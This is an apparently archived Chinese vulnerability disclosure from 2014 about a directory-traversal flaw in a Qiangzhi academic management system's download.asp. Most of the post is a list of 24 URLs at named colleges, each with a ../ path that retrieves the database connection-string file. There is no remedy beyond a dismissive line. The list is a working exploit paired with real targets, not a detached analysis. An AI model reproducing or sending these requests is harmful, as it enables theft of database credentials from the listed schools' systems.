漏洞详情

披露状态:

2014-11-09: 细节已通知厂商并且等待厂商处理中
2014-11-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

关键字:版 权:长沙市强智科技发展有限责任公司·版权所有
这只是我搜索的部分网站。

http://58.18.213.238/jwgl/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://jiaowu.hustwenhua.net/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://219.148.49.53/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://e.tjmvti.cn/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://221.2.229.222/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://bbs.hbpa.edu.cn/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://203.90.137.110/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://121.28.180.234/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://jiaowu.hncz.edu.cn/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://218.204.113.170/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://114.255.66.248/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://221.232.159.24/dhjw/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://jw.mdjnu.cn/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://221.238.158.84/jw/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://219.217.72.30/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://210.44.80.14/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://221.212.251.229/jiaowu2008/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://jwxt.hnebp.edu.cn/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://61.183.19.35/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://113.135.195.58/jiaowu_ylxy/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://59.173.249.245/wljiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://202.194.86.187/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://jw.hljys.cn/public/download.asp?filename=../jwjs/conn/connstring.asp.
http://jiaowu.jljcxy.com/jiaowu/public/download.asp?filename=../jwjs/conn/connstring.asp.

漏洞证明:

QQ截图20141108230945.jpg

修复方案:

你们更专业!

标签: none

评论已关闭